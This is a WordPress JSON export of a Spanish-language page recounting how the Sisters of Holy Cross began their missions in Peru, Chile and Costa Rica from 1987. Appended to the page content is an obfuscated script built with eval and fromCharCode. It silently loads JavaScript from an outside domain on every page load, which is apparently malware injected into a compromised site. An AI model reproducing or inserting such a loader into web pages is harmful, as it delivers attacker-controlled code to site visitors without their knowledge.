{"id":368,"date":"2020-12-20T23:30:32","date_gmt":"2020-12-20T23:30:32","guid":{"rendered":"https:\/\/hermanasdesantacruz.org\/?page_id=368"},"modified":"2020-12-21T00:39:43","modified_gmt":"2020-12-21T00:39:43","slug":"nuestros-inicios-en-america-latina","status":"publish","type":"page","link":"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/","title":{"rendered":"Nuestros inicios en Am\u00e9rica Latina"},"content":{"rendered":"<p>[vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column][vc_column_text]<\/p>\n<h3><span class=\"font16BlancoB\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone wp-image-372 \" src=\"https:\/\/hermanasdesantacruz.org\/wp-content\/uploads\/2020\/12\/acora-inicio-america-latina-1024x502.png\" alt=\"\" width=\"507\" height=\"249\" srcset=\"https:\/\/hermanasdesantacruz.org\/wp-content\/uploads\/2020\/12\/acora-inicio-america-latina-1024x502.png 1024w, https:\/\/hermanasdesantacruz.org\/wp-content\/uploads\/2020\/12\/acora-inicio-america-latina-300x147.png 300w, https:\/\/hermanasdesantacruz.org\/wp-content\/uploads\/2020\/12\/acora-inicio-america-latina-768x376.png 768w, https:\/\/hermanasdesantacruz.org\/wp-content\/uploads\/2020\/12\/acora-inicio-america-latina-700x343.png 700w, https:\/\/hermanasdesantacruz.org\/wp-content\/uploads\/2020\/12\/acora-inicio-america-latina.png 1500w\" sizes=\"(max-width: 507px) 100vw, 507px\" \/><\/span><\/h3>\n<h3><span class=\"font16BlancoB\">Nuestros Inicios en Am\u00e9rica Latina<\/span><\/h3>\n<p>El 13 de Abril de 1987 las Hermanas de Santa Cruz Liette Finnerty, Francoise Savoie y Margarite Gravel llegaron al Per\u00fa. Se quedaron unos meses en Lima para aprender el castellano y luego fueron a trabajar a Puno. Continuando con el esp\u00edritu de familia que heredaron del P. Basilio Moreau, llegaron para trabajar en colaboraci\u00f3n con los Padres de Santa Cruz en el altiplano.<\/p>\n<p>En octubre de ese mismo a\u00f1o lleg\u00f3 Marie Pilon, para unirse en la labor que las hermanas realizaban en Puno. Margarita Gravel regres\u00f3 a Lima ya que el clima de Puno no favorec\u00eda su salud. Es as\u00ed como se abri\u00f3 la misi\u00f3n en San Juan de Lurigancho. Luego llegar\u00edan otras hermanas de Canad\u00e1 y los Estados Unidos.<\/p>\n<p>En Marzo de 1998 se inici\u00f3 la misi\u00f3n en Santiago de Chile, respondiendo a la invitaci\u00f3n de los padres de Santa Cruz de Chile. Las hermanas empezaron a colaborar en la Parroquia de Andacollo, en un hogar para ni\u00f1os y en los colegios que los padres y hermanos dirigen en Santiago.<\/p>\n<p>Sabiendo de la migraci\u00f3n de personas del altiplano a la costa del Per\u00fa, en marzo de 2000 se inici\u00f3 la misi\u00f3n en Tacna para continuar acompa\u00f1\u00e1ndolos. Empezaron su trabajo en la pastoral parroquial y en visitas a las familias.<\/p>\n<p>Ya que una hermana CSC estuvo desde hace 12 a\u00f1os trabajando en el Instituto Ecum\u00e9nico de Investigaci\u00f3n en San Jos\u00e9 de Costa Rica, en abril del 2004 se abri\u00f3 una casa de estudios para las hermanas en formaci\u00f3n.<\/p>\n<p>De 1987 a 2007 las Hermanas de Santa Cruz han sido bendecidas con vocaciones propias del lugar. Varias de ellas est\u00e1n trabajando en los lugares de inserci\u00f3n y otras cursan estudios de formaci\u00f3n profesional.<\/p>\n<p>&nbsp;<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column width=\u00bb1\/2&#8243;][vc_single_image image=\u00bb404&#8243; img_size=\u00bbfull\u00bb qode_css_animation=\u00bb\u00bb][vc_single_image image=\u00bb411&#8243; img_size=\u00bbfull\u00bb qode_css_animation=\u00bb\u00bb][vc_single_image image=\u00bb423&#8243; img_size=\u00bbfull\u00bb qode_css_animation=\u00bb\u00bb][vc_single_image image=\u00bb426&#8243; img_size=\u00bbfull\u00bb qode_css_animation=\u00bb\u00bb][\/vc_column][vc_column width=\u00bb1\/2&#8243;][vc_single_image image=\u00bb408&#8243; img_size=\u00bbfull\u00bb qode_css_animation=\u00bb\u00bb][vc_single_image image=\u00bb412&#8243; img_size=\u00bbfull\u00bb qode_css_animation=\u00bb\u00bb][vc_single_image image=\u00bb425&#8243; img_size=\u00bbfull\u00bb qode_css_animation=\u00bb\u00bb][\/vc_column][\/vc_row]<script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column][vc_column_text] Nuestros Inicios en Am\u00e9rica Latina El 13 de Abril de 1987 las Hermanas de Santa Cruz Liette Finnerty,<span class=\"excerpt-hellip\"> [\u2026]<\/span><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-368","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v23.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Nuestros inicios en Am\u00e9rica Latina - Congregaci\u00f3n Hermanas de Santa Cruz<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Nuestros inicios en Am\u00e9rica Latina - Congregaci\u00f3n Hermanas de Santa Cruz\" \/>\n<meta property=\"og:description\" content=\"[vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column][vc_column_text] Nuestros Inicios en Am\u00e9rica Latina El 13 de Abril de 1987 las Hermanas de Santa Cruz Liette Finnerty, [\u2026]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/\" \/>\n<meta property=\"og:site_name\" content=\"Congregaci\u00f3n Hermanas de Santa Cruz\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-21T00:39:43+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hermanasdesantacruz.org\/wp-content\/uploads\/2020\/12\/acora-inicio-america-latina-1024x502.png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/\",\"url\":\"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/\",\"name\":\"Nuestros inicios en Am\u00e9rica Latina - Congregaci\u00f3n Hermanas de Santa Cruz\",\"isPartOf\":{\"@id\":\"https:\/\/hermanasdesantacruz.org\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hermanasdesantacruz.org\/wp-content\/uploads\/2020\/12\/acora-inicio-america-latina-1024x502.png\",\"datePublished\":\"2020-12-20T23:30:32+00:00\",\"dateModified\":\"2020-12-21T00:39:43+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/#primaryimage\",\"url\":\"https:\/\/hermanasdesantacruz.org\/wp-content\/uploads\/2020\/12\/acora-inicio-america-latina.png\",\"contentUrl\":\"https:\/\/hermanasdesantacruz.org\/wp-content\/uploads\/2020\/12\/acora-inicio-america-latina.png\",\"width\":1500,\"height\":735},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hermanasdesantacruz.org\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Nuestros inicios en Am\u00e9rica Latina\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hermanasdesantacruz.org\/#website\",\"url\":\"https:\/\/hermanasdesantacruz.org\/\",\"name\":\"Congregaci\u00f3n Hermanas de Santa Cruz\",\"description\":\"Hermanas de Santa Cruz - Tacna\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hermanasdesantacruz.org\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"es\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Nuestros inicios en Am\u00e9rica Latina - Congregaci\u00f3n Hermanas de Santa Cruz","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/","og_locale":"es_ES","og_type":"article","og_title":"Nuestros inicios en Am\u00e9rica Latina - Congregaci\u00f3n Hermanas de Santa Cruz","og_description":"[vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column][vc_column_text] Nuestros Inicios en Am\u00e9rica Latina El 13 de Abril de 1987 las Hermanas de Santa Cruz Liette Finnerty, [\u2026]","og_url":"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/","og_site_name":"Congregaci\u00f3n Hermanas de Santa Cruz","article_modified_time":"2020-12-21T00:39:43+00:00","og_image":[{"url":"https:\/\/hermanasdesantacruz.org\/wp-content\/uploads\/2020\/12\/acora-inicio-america-latina-1024x502.png"}],"twitter_card":"summary_large_image","twitter_misc":{"Tiempo de lectura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/","url":"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/","name":"Nuestros inicios en Am\u00e9rica Latina - Congregaci\u00f3n Hermanas de Santa Cruz","isPartOf":{"@id":"https:\/\/hermanasdesantacruz.org\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/#primaryimage"},"image":{"@id":"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/#primaryimage"},"thumbnailUrl":"https:\/\/hermanasdesantacruz.org\/wp-content\/uploads\/2020\/12\/acora-inicio-america-latina-1024x502.png","datePublished":"2020-12-20T23:30:32+00:00","dateModified":"2020-12-21T00:39:43+00:00","breadcrumb":{"@id":"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/#primaryimage","url":"https:\/\/hermanasdesantacruz.org\/wp-content\/uploads\/2020\/12\/acora-inicio-america-latina.png","contentUrl":"https:\/\/hermanasdesantacruz.org\/wp-content\/uploads\/2020\/12\/acora-inicio-america-latina.png","width":1500,"height":735},{"@type":"BreadcrumbList","@id":"https:\/\/hermanasdesantacruz.org\/index.php\/nuestros-inicios-en-america-latina\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hermanasdesantacruz.org\/"},{"@type":"ListItem","position":2,"name":"Nuestros inicios en Am\u00e9rica Latina"}]},{"@type":"WebSite","@id":"https:\/\/hermanasdesantacruz.org\/#website","url":"https:\/\/hermanasdesantacruz.org\/","name":"Congregaci\u00f3n Hermanas de Santa Cruz","description":"Hermanas de Santa Cruz - Tacna","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hermanasdesantacruz.org\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"es"}]}},"_links":{"self":[{"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/pages\/368","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/comments?post=368"}],"version-history":[{"count":9,"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/pages\/368\/revisions"}],"predecessor-version":[{"id":428,"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/pages\/368\/revisions\/428"}],"wp:attachment":[{"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/media?parent=368"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}